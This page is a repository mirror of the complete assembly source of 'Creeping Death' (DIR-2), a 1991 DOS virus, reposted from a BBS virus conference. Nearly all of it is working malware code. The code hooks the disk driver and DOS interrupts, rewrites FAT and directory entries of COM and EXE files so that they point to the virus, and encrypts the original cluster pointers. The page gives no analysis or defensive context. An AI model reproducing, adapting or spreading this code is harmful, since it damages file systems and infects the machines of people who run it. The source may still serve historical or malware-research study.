mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
498 lines
11 KiB
NASM
498 lines
11 KiB
NASM
|
===========================================================================
|
||
|
BBS: The Programmer's Inn
|
||
|
Date: 11-24-91 (19:52) Number: 3544
|
||
|
From: AHMED DOGAN Refer#: NONE
|
||
|
To: ALL Recvd: NO
|
||
|
Subj: DIR-2 Conf: (16) VIRUS
|
||
|
---------------------------------------------------------------------------
|
||
|
; Creeping Death V 1.0
|
||
|
;
|
||
|
; (C) Copyright 1991 by VirusSoft Corp.
|
||
|
|
||
|
i13org = 5f8h
|
||
|
i21org = 5fch
|
||
|
|
||
|
org 100h
|
||
|
|
||
|
mov sp,600h
|
||
|
inc counter
|
||
|
xor cx,cx
|
||
|
mov ds,cx
|
||
|
lds ax,[0c1h]
|
||
|
add ax,21h
|
||
|
push ds
|
||
|
push ax
|
||
|
mov ah,30h
|
||
|
call jump
|
||
|
cmp al,4
|
||
|
sbb si,si
|
||
|
mov drive+2,byte ptr -1
|
||
|
mov bx,60h
|
||
|
mov ah,4ah
|
||
|
call jump
|
||
|
|
||
|
mov ah,52h
|
||
|
call jump
|
||
|
push es:[bx-2]
|
||
|
lds bx,es:[bx]
|
||
|
|
||
|
search: mov ax,[bx+si+15h]
|
||
|
cmp ax,70h
|
||
|
jne next
|
||
|
xchg ax,cx
|
||
|
mov [bx+si+18h],byte ptr -1
|
||
|
mov di,[bx+si+13h]
|
||
|
mov [bx+si+13h],offset header
|
||
|
mov [bx+si+15h],cs
|
||
|
next: lds bx,[bx+si+19h]
|
||
|
cmp bx,-1
|
||
|
jne search
|
||
|
jcxz install
|
||
|
|
||
|
pop ds
|
||
|
mov ax,ds
|
||
|
add ax,[3]
|
||
|
inc ax
|
||
|
mov dx,cs
|
||
|
dec dx
|
||
|
cmp ax,dx
|
||
|
jne no_boot
|
||
|
add [3],61h
|
||
|
no_boot: mov ds,dx
|
||
|
mov [1],8
|
||
|
|
||
|
mov ds,cx
|
||
|
les ax,[di+6]
|
||
|
mov cs:str_block,ax
|
||
|
mov cs:int_block,es
|
||
|
|
||
|
cld
|
||
|
mov si,1
|
||
|
scan: dec si
|
||
|
lodsw
|
||
|
cmp ax,1effh
|
||
|
jne scan
|
||
|
mov ax,2cah
|
||
|
cmp [si+4],ax
|
||
|
je right
|
||
|
cmp [si+5],ax
|
||
|
jne scan
|
||
|
right: lodsw
|
||
|
push cs
|
||
|
pop es
|
||
|
mov di,offset modify+1
|
||
|
stosw
|
||
|
xchg ax,si
|
||
|
mov di,offset i13org
|
||
|
cli
|
||
|
movsw
|
||
|
movsw
|
||
|
|
||
|
mov dx,0c000h
|
||
|
fdsk1: mov ds,dx
|
||
|
xor si,si
|
||
|
lodsw
|
||
|
cmp ax,0aa55h
|
||
|
jne fdsk4
|
||
|
cbw
|
||
|
lodsb
|
||
|
mov cl,9
|
||
|
sal ax,cl
|
||
|
fdsk2: cmp [si],6c7h
|
||
|
jne fdsk3
|
||
|
cmp [si+2],4ch
|
||
|
jne fdsk3
|
||
|
push dx
|
||
|
push [si+4]
|
||
|
jmp short death
|
||
|
install: int 20h
|
||
|
file: db "c:",255,0
|
||
|
fdsk3: inc si
|
||
|
cmp si,ax
|
||
|
jb fdsk2
|
||
|
fdsk4: inc dx
|
||
|
cmp dh,0f0h
|
||
|
jb fdsk1
|
||
|
|
||
|
sub sp,4
|
||
|
death: push cs
|
||
|
pop ds
|
||
|
mov bx,[2ch]
|
||
|
mov es,bx
|
||
|
mov ah,49h
|
||
|
call jump
|
||
|
xor ax,ax
|
||
|
test bx,bx
|
||
|
jz boot
|
||
|
mov di,1
|
||
|
seek: dec di
|
||
|
scasw
|
||
|
jne seek
|
||
|
lea si,[di+2]
|
||
|
jmp short exec
|
||
|
boot: mov es,[16h]
|
||
|
mov bx,es:[16h]
|
||
|
dec bx
|
||
|
xor si,si
|
||
|
exec: push bx
|
||
|
mov bx,offset param
|
||
|
mov [bx+4],cs
|
||
|
mov [bx+8],cs
|
||
|
mov [bx+12],cs
|
||
|
pop ds
|
||
|
push cs
|
||
|
pop es
|
||
|
|
||
|
mov di,offset f_name
|
||
|
push di
|
||
|
mov cx,40
|
||
|
rep movsw
|
||
|
push cs
|
||
|
pop ds
|
||
|
|
||
|
mov ah,3dh
|
||
|
mov dx,offset file
|
||
|
call jump
|
||
|
pop dx
|
||
|
|
||
|
mov ax,4b00h
|
||
|
call jump
|
||
|
mov ah,4dh
|
||
|
call jump
|
||
|
mov ah,4ch
|
||
|
|
||
|
jump: pushf
|
||
|
call dword ptr cs:[i21org]
|
||
|
ret
|
||
|
|
||
|
|
||
|
;--------Installation complete
|
||
|
|
||
|
i13pr: mov ah,3
|
||
|
jmp dword ptr cs:[i13org]
|
||
|
|
||
|
|
||
|
main: push ax ; driver
|
||
|
push cx ; strategy block
|
||
|
push dx
|
||
|
push ds
|
||
|
push si
|
||
|
push di
|
||
|
|
||
|
push es
|
||
|
pop ds
|
||
|
mov al,[bx+2]
|
||
|
|
||
|
cmp al,4 ; Input
|
||
|
je input
|
||
|
cmp al,8
|
||
|
je output
|
||
|
cmp al,9
|
||
|
je output
|
||
|
|
||
|
call in
|
||
|
cmp al,2 ; Build BPB
|
||
|
jne ppp ;
|
||
|
lds si,[bx+12h]
|
||
|
mov di,offset bpb_buf
|
||
|
mov es:[bx+12h],di
|
||
|
mov es:[bx+14h],cs
|
||
|
push es
|
||
|
push cs
|
||
|
pop es
|
||
|
|
||
|
mov cx,16
|
||
|
rep movsw
|
||
|
pop es
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov al,[di+2-32]
|
||
|
cmp al,2
|
||
|
adc al,0
|
||
|
cbw
|
||
|
cmp [di+8-32],0
|
||
|
je m32
|
||
|
sub [di+8-32],ax
|
||
|
jmp short ppp
|
||
|
m32: sub [di+15h-32],ax
|
||
|
sbb [di+17h-32],0
|
||
|
|
||
|
ppp: pop di
|
||
|
pop si
|
||
|
pop ds
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop ax
|
||
|
rts: retf
|
||
|
|
||
|
output: mov cx,0ff09h
|
||
|
call check
|
||
|
jz inf_sec
|
||
|
call in
|
||
|
jmp short inf_dsk
|
||
|
|
||
|
inf_sec: jmp _inf_sec
|
||
|
read: jmp _read
|
||
|
read_: add sp,16
|
||
|
jmp short ppp
|
||
|
|
||
|
input: call check
|
||
|
jz read
|
||
|
inf_dsk: mov byte ptr [bx+2],4
|
||
|
cld
|
||
|
lea si,[bx+0eh]
|
||
|
mov cx,8
|
||
|
save: lodsw
|
||
|
push ax
|
||
|
loop save
|
||
|
mov [bx+14h],1
|
||
|
call driver
|
||
|
jnz read_
|
||
|
mov byte ptr [bx+2],2
|
||
|
call in
|
||
|
lds si,[bx+12h]
|
||
|
mov ax,[si+6]
|
||
|
add ax,15
|
||
|
mov cl,4
|
||
|
shr ax,cl
|
||
|
mov di,[si+0bh]
|
||
|
add di,di
|
||
|
stc
|
||
|
adc di,ax
|
||
|
push di
|
||
|
cwd
|
||
|
mov ax,[si+8]
|
||
|
test ax,ax
|
||
|
jnz more
|
||
|
mov ax,[si+15h]
|
||
|
mov dx,[si+17h]
|
||
|
more: xor cx,cx
|
||
|
sub ax,di
|
||
|
sbb dx,cx
|
||
|
mov cl,[si+2]
|
||
|
div cx
|
||
|
cmp cl,2
|
||
|
sbb ax,-1
|
||
|
push ax
|
||
|
call convert
|
||
|
mov byte ptr es:[bx+2],4
|
||
|
mov es:[bx+14h],ax
|
||
|
call driver
|
||
|
again: lds si,es:[bx+0eh]
|
||
|
add si,dx
|
||
|
sub dh,cl
|
||
|
adc dx,ax
|
||
|
mov cs:gad+1,dx
|
||
|
cmp cl,1
|
||
|
je small
|
||
|
mov ax,[si]
|
||
|
and ax,di
|
||
|
cmp ax,0fff7h
|
||
|
je bad
|
||
|
cmp ax,0ff7h
|
||
|
je bad
|
||
|
cmp ax,0ff70h
|
||
|
jne ok
|
||
|
bad: pop ax
|
||
|
dec ax
|
||
|
push ax
|
||
|
call convert
|
||
|
jmp short again
|
||
|
|
||
|
small: not di
|
||
|
and [si],di
|
||
|
pop ax
|
||
|
push ax
|
||
|
inc ax
|
||
|
push ax
|
||
|
mov dx,0fh
|
||
|
test di,dx
|
||
|
jz here
|
||
|
inc dx
|
||
|
mul dx
|
||
|
here: or [si],ax
|
||
|
pop ax
|
||
|
call convert
|
||
|
mov si,es:[bx+0eh]
|
||
|
add si,dx
|
||
|
mov ax,[si]
|
||
|
and ax,di
|
||
|
ok: mov dx,di
|
||
|
dec dx
|
||
|
and dx,di
|
||
|
not di
|
||
|
and [si],di
|
||
|
or [si],dx
|
||
|
|
||
|
cmp ax,dx
|
||
|
pop ax
|
||
|
pop di
|
||
|
mov cs:pointer+1,ax
|
||
|
je _read_
|
||
|
mov dx,[si]
|
||
|
push ds
|
||
|
push si
|
||
|
call write
|
||
|
pop si
|
||
|
pop ds
|
||
|
jnz _read_
|
||
|
call driver
|
||
|
cmp [si],dx
|
||
|
jne _read_
|
||
|
dec ax
|
||
|
dec ax
|
||
|
mul cx
|
||
|
add ax,di
|
||
|
adc dx,0
|
||
|
push es
|
||
|
pop ds
|
||
|
mov [bx+12h],2
|
||
|
mov [bx+14h],ax
|
||
|
test dx,dx
|
||
|
jz less
|
||
|
mov [bx+14h],-1
|
||
|
mov [bx+1ah],ax
|
||
|
mov [bx+1ch],dx
|
||
|
less: mov [bx+10h],cs
|
||
|
mov [bx+0eh],100h
|
||
|
call write
|
||
|
|
||
|
_read_: std
|
||
|
lea di,[bx+1ch]
|
||
|
mov cx,8
|
||
|
load: pop ax
|
||
|
stosw
|
||
|
loop load
|
||
|
_read: call in
|
||
|
|
||
|
mov cx,9
|
||
|
_inf_sec:
|
||
|
mov di,es:[bx+12h]
|
||
|
lds si,es:[bx+0eh]
|
||
|
sal di,cl
|
||
|
xor cl,cl
|
||
|
add di,si
|
||
|
xor dl,dl
|
||
|
push ds
|
||
|
push si
|
||
|
call find
|
||
|
jcxz no_inf
|
||
|
call write
|
||
|
and es:[bx+4],byte ptr 07fh
|
||
|
no_inf: pop si
|
||
|
pop ds
|
||
|
inc dx
|
||
|
call find
|
||
|
jmp ppp
|
||
|
|
||
|
;--------Subroutines
|
||
|
|
||
|
find: mov ax,[si+8]
|
||
|
cmp ax,"XE"
|
||
|
jne com
|
||
|
cmp [si+10],al
|
||
|
je found
|
||
|
com: cmp ax,"OC"
|
||
|
jne go_on
|
||
|
cmp byte ptr [si+10],"M"
|
||
|
jne go_on
|
||
|
|
||
|
found: test [si+1eh],0ffc0h ; >4MB
|
||
|
jnz go_on
|
||
|
test [si+1dh],03ff8h ; <2048B
|
||
|
jz go_on
|
||
|
test [si+0bh],byte ptr 1ch
|
||
|
jnz go_on
|
||
|
test dl,dl
|
||
|
jnz rest
|
||
|
pointer: mov ax,1234h
|
||
|
cmp ax,[si+1ah]
|
||
|
je go_on
|
||
|
xchg ax,[si+1ah]
|
||
|
gad: xor ax,1234h
|
||
|
mov [si+14h],ax
|
||
|
loop go_on
|
||
|
rest: xor ax,ax
|
||
|
xchg ax,[si+14h]
|
||
|
xor ax,cs:gad+1
|
||
|
mov [si+1ah],ax
|
||
|
go_on: ;rol cs:gad+1,1
|
||
|
db 2eh,0d1h,6
|
||
|
dw offset gad+1
|
||
|
add si,32
|
||
|
cmp di,si
|
||
|
jne find
|
||
|
ret
|
||
|
|
||
|
check: mov ah,[bx+1]
|
||
|
drive: cmp ah,-1
|
||
|
mov cs:[drive+2],ah
|
||
|
jne changed
|
||
|
push [bx+0eh]
|
||
|
mov byte ptr [bx+2],1
|
||
|
call in
|
||
|
cmp byte ptr [bx+0eh],1
|
||
|
pop [bx+0eh]
|
||
|
mov [bx+2],al
|
||
|
changed: ret
|
||
|
|
||
|
write: cmp byte ptr es:[bx+2],8
|
||
|
jae in
|
||
|
mov byte ptr es:[bx+2],4
|
||
|
mov si,70h
|
||
|
mov ds,si
|
||
|
modify: mov si,1234h
|
||
|
push [si]
|
||
|
push [si+2]
|
||
|
mov [si],offset i13pr
|
||
|
mov [si+2],cs
|
||
|
call in
|
||
|
pop [si+2]
|
||
|
pop [si]
|
||
|
ret
|
||
|
|
||
|
driver: mov es:[bx+12h],1
|
||
|
in:
|
||
|
db 09ah
|
||
|
str_block:
|
||
|
dw ?,70h
|
||
|
db 09ah
|
||
|
int_block:
|
||
|
dw ?,70h
|
||
|
test es:[bx+4],byte ptr 80h
|
||
|
ret
|
||
|
|
||
|
convert: cmp ax,0ff0h
|
||
|
jae fat_16
|
||
|
mov si,3
|
||
|
xor cs:[si+gad-1],si
|
||
|
mul si
|
||
|
shr ax,1
|
||
|
mov di,0fffh
|
||
|
jnc cont
|
||
|
mov di,0fff0h
|
||
|
jmp short cont
|
||
|
fat_16: mov si,2
|
||
|
mul si
|
||
|
mov di,0ffffh
|
||
|
cont: mov si,512
|
||
|
div si
|
||
|
header: inc ax
|
||
|
ret
|
||
|
|
||
|
counter: dw 0
|
||
|
|
||
|
dw 842h
|
||
|
dw offset main
|
||
|
dw offset rts
|
||
|
db 7fh
|
||
|
|
||
|
param: dw 0,80h,?,5ch,?,6ch,?
|
||
|
|
||
|
bpb_buf: db 32 dup(?)
|
||
|
f_name: db 80 dup(?)
|
||
|
|
||
|
;--------The End.
|
||
|
|
||
|
|